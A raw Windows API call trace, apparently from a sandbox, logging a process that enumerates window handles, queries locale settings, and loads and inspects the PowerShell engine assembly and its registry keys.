	[0886.456] GetWindowThreadProcessId (in: hWnd=0x1047e, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0xe48
	[0886.456] GetWindowThreadProcessId (in: hWnd=0x1046e, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0xbc8
	[0886.457] GetWindowThreadProcessId (in: hWnd=0x1045e, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0xdf8
	[0886.457] GetWindowThreadProcessId (in: hWnd=0x1044c, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x318
	[0886.457] GetWindowThreadProcessId (in: hWnd=0x10440, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0xcac
	[0886.457] GetWindowThreadProcessId (in: hWnd=0x10438, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x8bc
	[0886.457] GetWindowThreadProcessId (in: hWnd=0x10434, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0xf9c
	[0886.457] GetWindowThreadProcessId (in: hWnd=0x10430, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0xf48
	[0887.018] GetWindowThreadProcessId (in: hWnd=0x10414, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0xe40
	[0887.018] GetWindowThreadProcessId (in: hWnd=0x10410, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0xecc
	[0887.018] GetWindowThreadProcessId (in: hWnd=0x1040c, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0xeb8
	[0887.018] GetWindowThreadProcessId (in: hWnd=0x10408, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0xe80
	[0887.018] GetWindowThreadProcessId (in: hWnd=0x10404, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0xe98
	[0887.018] GetWindowThreadProcessId (in: hWnd=0x10400, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0xe60
	[0887.019] GetWindowThreadProcessId (in: hWnd=0x103fc, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0xee4
	[0887.019] GetWindowThreadProcessId (in: hWnd=0x103ee, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0xf00
	[0887.019] GetWindowThreadProcessId (in: hWnd=0x10398, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0xdf0
	[0887.019] GetWindowThreadProcessId (in: hWnd=0x10388, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0xe1c
	[0887.019] GetWindowThreadProcessId (in: hWnd=0x10380, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0xdd0
	[0887.019] GetWindowThreadProcessId (in: hWnd=0x1036c, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0xd94
	[0887.019] GetWindowThreadProcessId (in: hWnd=0x10368, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0xd74
	[0887.019] GetWindowThreadProcessId (in: hWnd=0x10364, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0xd00
	[0887.019] GetWindowThreadProcessId (in: hWnd=0x1035e, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0xcd8
	[0887.019] GetWindowThreadProcessId (in: hWnd=0x20240, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0xc84
	[0887.019] GetWindowThreadProcessId (in: hWnd=0x30220, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0xca4
	[0887.019] GetWindowThreadProcessId (in: hWnd=0x2010e, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0xc64
	[0887.020] GetWindowThreadProcessId (in: hWnd=0x10344, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0xc24
	[0887.020] GetWindowThreadProcessId (in: hWnd=0x1032a, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0xb84
	[0887.020] GetWindowThreadProcessId (in: hWnd=0x10316, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0xbac
	[0887.020] GetWindowThreadProcessId (in: hWnd=0x102f8, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x384
	[0887.020] GetWindowThreadProcessId (in: hWnd=0x102de, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0xab8
	[0887.020] GetWindowThreadProcessId (in: hWnd=0x102da, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x33c
	[0887.020] GetWindowThreadProcessId (in: hWnd=0x102d0, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0xa44
	[0887.020] GetWindowThreadProcessId (in: hWnd=0x102cc, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0xa64
	[0887.020] GetWindowThreadProcessId (in: hWnd=0x102c8, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x8a8
	[0887.020] GetWindowThreadProcessId (in: hWnd=0x102c4, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0xaf0
	[0887.020] GetWindowThreadProcessId (in: hWnd=0x102c0, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x88c
	[0887.020] GetWindowThreadProcessId (in: hWnd=0x102bc, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0xb04
	[0887.021] GetWindowThreadProcessId (in: hWnd=0x102b0, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x910
	[0887.021] GetWindowThreadProcessId (in: hWnd=0x102ac, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x230
	[0887.021] GetWindowThreadProcessId (in: hWnd=0x30298, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0xac0
	[0887.021] GetWindowThreadProcessId (in: hWnd=0x2029a, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0xab4
	[0887.021] GetWindowThreadProcessId (in: hWnd=0x10262, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0xaac
	[0887.021] GetWindowThreadProcessId (in: hWnd=0x10252, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x3d0
	[0887.021] GetWindowThreadProcessId (in: hWnd=0x10242, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x978
	[0887.021] GetWindowThreadProcessId (in: hWnd=0x10228, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0xa7c
	[0887.021] GetWindowThreadProcessId (in: hWnd=0x10224, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x59c
	[0887.021] GetWindowThreadProcessId (in: hWnd=0x20212, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0xa88
	[0887.021] GetWindowThreadProcessId (in: hWnd=0x1021c, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0xa6c
	[0887.021] GetWindowThreadProcessId (in: hWnd=0x10214, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0xa68
	[0887.022] GetWindowThreadProcessId (in: hWnd=0x20206, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x9f8
	[0887.022] GetWindowThreadProcessId (in: hWnd=0x20204, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0xa04
	[0887.022] GetWindowThreadProcessId (in: hWnd=0x1020a, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x924
	[0887.022] GetWindowThreadProcessId (in: hWnd=0x10200, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x8dc
	[0887.022] GetWindowThreadProcessId (in: hWnd=0x201ec, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x7dc
	[0887.022] GetWindowThreadProcessId (in: hWnd=0x301d6, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x768
	[0887.022] GetWindowThreadProcessId (in: hWnd=0x301e0, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x764
	[0887.022] GetWindowThreadProcessId (in: hWnd=0x201e4, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x820
	[0887.022] GetWindowThreadProcessId (in: hWnd=0x201c6, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x810
	[0887.022] GetWindowThreadProcessId (in: hWnd=0x301f2, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x794
	[0887.022] GetWindowThreadProcessId (in: hWnd=0x401b6, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x83c
	[0887.022] GetWindowThreadProcessId (in: hWnd=0x501be, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x7ac
	[0887.023] GetWindowThreadProcessId (in: hWnd=0x160162, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0xb44
	[0887.023] GetWindowThreadProcessId (in: hWnd=0x108d6, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x6bc
	[0887.023] GetWindowThreadProcessId (in: hWnd=0x500ea, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0xb5c
	[0887.023] GetWindowThreadProcessId (in: hWnd=0x101b0, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x838
	[0887.023] GetWindowThreadProcessId (in: hWnd=0x800a8, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x4d0
	[0887.023] GetWindowThreadProcessId (in: hWnd=0x400b0, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x4d0
	[0887.023] GetWindowThreadProcessId (in: hWnd=0x300c6, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x4d0
	[0887.023] GetWindowThreadProcessId (in: hWnd=0x300d2, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x4d0
	[0887.023] GetWindowThreadProcessId (in: hWnd=0x300ce, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x4d0
	[0887.023] GetWindowThreadProcessId (in: hWnd=0x300d8, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x4d0
	[0887.023] GetWindowThreadProcessId (in: hWnd=0x400b8, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x4d0
	[0887.023] GetWindowThreadProcessId (in: hWnd=0x300ac, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x4d0
	[0887.023] GetWindowThreadProcessId (in: hWnd=0x101ac, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x818
	[0887.024] GetWindowThreadProcessId (in: hWnd=0x101a8, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x5b8
	[0887.024] GetWindowThreadProcessId (in: hWnd=0x101a4, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x494
	[0887.024] GetWindowThreadProcessId (in: hWnd=0x101a0, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x1ec
	[0887.024] GetWindowThreadProcessId (in: hWnd=0x1019c, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x440
	[0887.024] GetWindowThreadProcessId (in: hWnd=0x10198, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x7e8
	[0887.024] GetWindowThreadProcessId (in: hWnd=0x10194, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x730
	[0887.024] GetWindowThreadProcessId (in: hWnd=0x10190, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x2c8
	[0887.024] GetWindowThreadProcessId (in: hWnd=0x1018c, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x31c
	[0887.028] WerSetFlags () returned 0x0
	[0887.036] SetThreadPreferredUILanguages (in: dwFlags=0x100, pwszLanguagesBuffer=0x0, pulNumLanguages=0x0 | out: pulNumLanguages=0x0) returned 1
	[0887.036] CoTaskMemFree (pv=0x0) 
	[0887.037] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x24e128, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x24e120 | out: pulNumLanguages=0x24e128, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x24e120) returned 1
	[0887.037] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x24e128, pwszLanguagesBuffer=0x2c3c538, pcchLanguagesBuffer=0x24e120 | out: pulNumLanguages=0x24e128, pwszLanguagesBuffer=0x2c3c538, pcchLanguagesBuffer=0x24e120) returned 1
	[0887.041] CoTaskMemAlloc (cb=0x24) returned 0x447070
	[0887.041] GetUserDefaultLocaleName (in: lpLocaleName=0x447070, cchLocaleName=16 | out: lpLocaleName="en-US") returned 6
	[0887.042] CoTaskMemFree (pv=0x447070) 
	[0887.516] CoTaskMemAlloc (cb=0x104) returned 0x439960
	[0887.516] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x439960, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0887.516] CoTaskMemFree (pv=0x439960) 
	[0887.518] CoTaskMemAlloc (cb=0x104) returned 0x439960
	[0887.518] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x439960, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0887.518] CoTaskMemFree (pv=0x439960) 
	[0887.520] CoTaskMemAlloc (cb=0x104) returned 0x439960
	[0887.520] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x439960, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0887.520] CoTaskMemFree (pv=0x439960) 
	[0887.530] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24daf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0887.530] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24db90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0887.531] SetErrorMode (uMode=0x1) returned 0x1
	[0887.531] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0x24dda0 | out: lpFileInformation=0x24dda0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1
	[0887.531] SetErrorMode (uMode=0x1) returned 0x1
	[0887.531] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0x24e010 | out: lpdwHandle=0x24e010) returned 0x94c
	[0888.150] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2c3fdc8 | out: lpData=0x2c3fdc8) returned 1
	[0888.151] VerQueryValueW (in: pBlock=0x2c3fdc8, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x24df88, puLen=0x24df80 | out: lplpBuffer=0x24df88*=0x2c3fe64, puLen=0x24df80) returned 1
	[0888.151] VerQueryValueW (in: pBlock=0x2c3fdc8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0x24def8, puLen=0x24def0 | out: lplpBuffer=0x24def8*=0x2c3ff40, puLen=0x24def0) returned 1
	[0888.151] lstrlenW (lpString="Microsoft Corporation") returned 21
	[0888.151] CoTaskMemAlloc (cb=0x2e) returned 0x440a20
	[0888.151] lstrcpyW (in: lpString1=0x440a20, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation"
	[0888.151] CoTaskMemFree (pv=0x440a20) 
	[0888.151] VerQueryValueW (in: pBlock=0x2c3fdc8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0x24def8, puLen=0x24def0 | out: lplpBuffer=0x24def8*=0x2c3ff94, puLen=0x24def0) returned 1
	[0888.151] lstrlenW (lpString="System.Management.Automation") returned 28
	[0888.151] CoTaskMemAlloc (cb=0x3c) returned 0x3bb060
	[0888.151] lstrcpyW (in: lpString1=0x3bb060, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation"
	[0888.151] CoTaskMemFree (pv=0x3bb060) 
	[0888.151] VerQueryValueW (in: pBlock=0x2c3fdc8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0x24def8, puLen=0x24def0 | out: lplpBuffer=0x24def8*=0x2c3fff0, puLen=0x24def0) returned 1
	[0888.151] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0888.151] CoTaskMemAlloc (cb=0x20) returned 0x4470d0
	[0888.151] lstrcpyW (in: lpString1=0x4470d0, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0888.151] CoTaskMemFree (pv=0x4470d0) 
	[0888.151] VerQueryValueW (in: pBlock=0x2c3fdc8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0x24def8, puLen=0x24def0 | out: lplpBuffer=0x24def8*=0x2c40030, puLen=0x24def0) returned 1
	[0888.151] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0888.151] CoTaskMemAlloc (cb=0x44) returned 0x3bb060
	[0888.151] lstrcpyW (in: lpString1=0x3bb060, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0888.151] CoTaskMemFree (pv=0x3bb060) 
	[0888.151] VerQueryValueW (in: pBlock=0x2c3fdc8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0x24def8, puLen=0x24def0 | out: lplpBuffer=0x24def8*=0x2c40098, puLen=0x24def0) returned 1
	[0888.151] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57
	[0888.151] CoTaskMemAlloc (cb=0x76) returned 0x3dd3a0
	[0888.151] lstrcpyW (in: lpString1=0x3dd3a0, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved."
	[0888.151] CoTaskMemFree (pv=0x3dd3a0) 
	[0888.151] VerQueryValueW (in: pBlock=0x2c3fdc8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0x24def8, puLen=0x24def0 | out: lplpBuffer=0x24def8*=0x2c40134, puLen=0x24def0) returned 1
	[0888.151] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0888.151] CoTaskMemAlloc (cb=0x44) returned 0x3bb060
	[0888.151] lstrcpyW (in: lpString1=0x3bb060, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0888.151] CoTaskMemFree (pv=0x3bb060) 
	[0888.151] VerQueryValueW (in: pBlock=0x2c3fdc8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0x24def8, puLen=0x24def0 | out: lplpBuffer=0x24def8*=0x2c40198, puLen=0x24def0) returned 1
	[0888.151] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42
	[0888.151] CoTaskMemAlloc (cb=0x58) returned 0x394f00
	[0888.151] lstrcpyW (in: lpString1=0x394f00, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System"
	[0888.152] CoTaskMemFree (pv=0x394f00) 
	[0888.152] VerQueryValueW (in: pBlock=0x2c3fdc8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0x24def8, puLen=0x24def0 | out: lplpBuffer=0x24def8*=0x2c40214, puLen=0x24def0) returned 1
	[0888.152] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0888.152] CoTaskMemAlloc (cb=0x20) returned 0x4470d0
	[0888.152] lstrcpyW (in: lpString1=0x4470d0, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0888.152] CoTaskMemFree (pv=0x4470d0) 
	[0888.152] VerQueryValueW (in: pBlock=0x2c3fdc8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0x24def8, puLen=0x24def0 | out: lplpBuffer=0x24def8*=0x2c3febc, puLen=0x24def0) returned 1
	[0888.152] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49
	[0888.152] CoTaskMemAlloc (cb=0x66) returned 0x4419d0
	[0888.152] lstrcpyW (in: lpString1=0x4419d0, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly"
	[0888.152] CoTaskMemFree (pv=0x4419d0) 
	[0888.152] VerQueryValueW (in: pBlock=0x2c3fdc8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0x24def8, puLen=0x24def0 | out: lplpBuffer=0x24def8*=0x0, puLen=0x24def0) returned 0
	[0888.152] VerQueryValueW (in: pBlock=0x2c3fdc8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0x24def8, puLen=0x24def0 | out: lplpBuffer=0x24def8*=0x0, puLen=0x24def0) returned 0
	[0888.152] VerQueryValueW (in: pBlock=0x2c3fdc8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0x24def8, puLen=0x24def0 | out: lplpBuffer=0x24def8*=0x0, puLen=0x24def0) returned 0
	[0888.152] VerQueryValueW (in: pBlock=0x2c3fdc8, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x24dec8, puLen=0x24dec0 | out: lplpBuffer=0x24dec8*=0x2c3fe64, puLen=0x24dec0) returned 1
	[0888.152] CoTaskMemAlloc (cb=0x204) returned 0x3e1cf0
	[0888.152] VerLanguageNameW (in: wLang=0x0, szLang=0x3e1cf0, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10
	[0888.152] CoTaskMemFree (pv=0x3e1cf0) 
	[0888.152] VerQueryValueW (in: pBlock=0x2c3fdc8, lpSubBlock="\\", lplpBuffer=0x24df18, puLen=0x24df10 | out: lplpBuffer=0x24df18*=0x2c3fdf0, puLen=0x24df10) returned 1
	[0888.159] CoTaskMemAlloc (cb=0x104) returned 0x439960
	[0888.159] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x439960, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0888.159] CoTaskMemFree (pv=0x439960) 
	[0888.160] CoTaskMemAlloc (cb=0x104) returned 0x439960
	[0888.160] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x439960, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0888.160] CoTaskMemFree (pv=0x439960) 
	[0888.166] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24dde8 | out: phkResult=0x24dde8*=0x2d0) returned 0x0
	[0888.167] RegOpenKeyExW (in: hKey=0x2d0, lpSubKey="1", ulOptions=0x0, samDesired=0x20019, phkResult=0x24ddd8 | out: phkResult=0x24ddd8*=0x2d4) returned 0x0
	[0888.167] RegOpenKeyExW (in: hKey=0x2d4, lpSubKey="PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x24de68 | out: phkResult=0x24de68*=0x2d8) returned 0x0
	[0888.170] RegQueryValueExW (in: hKey=0x2d8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x24ddac, lpData=0x0, lpcbData=0x24dda8*=0x0 | out: lpType=0x24ddac*=0x1, lpData=0x0, lpcbData=0x24dda8*=0x56) returned 0x0
	[0888.171] CoTaskMemAlloc (cb=0x5a) returned 0x441960
	[0888.171] RegQueryValueExW (in: hKey=0x2d8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x24dd7c, lpData=0x441960, lpcbData=0x24dd78*=0x56 | out: lpType=0x24dd7c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x24dd78*=0x56) returned 0x0
	[0888.171] CoTaskMemFree (pv=0x441960) 
	[0888.175] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0888.177] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0888.182] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0888.603] CoTaskMemAlloc (cb=0x104) returned 0x439960
	[0888.603] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x439960, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0888.603] CoTaskMemFree (pv=0x439960) 
	[0890.163] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x24d9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0890.163] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x24d9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0890.790] CoTaskMemAlloc (cb=0x104) returned 0x439a70
	[0890.790] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x439a70, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0890.790] CoTaskMemFree (pv=0x439a70) 
	[0890.792] CoTaskMemAlloc (cb=0x104) returned 0x439a70
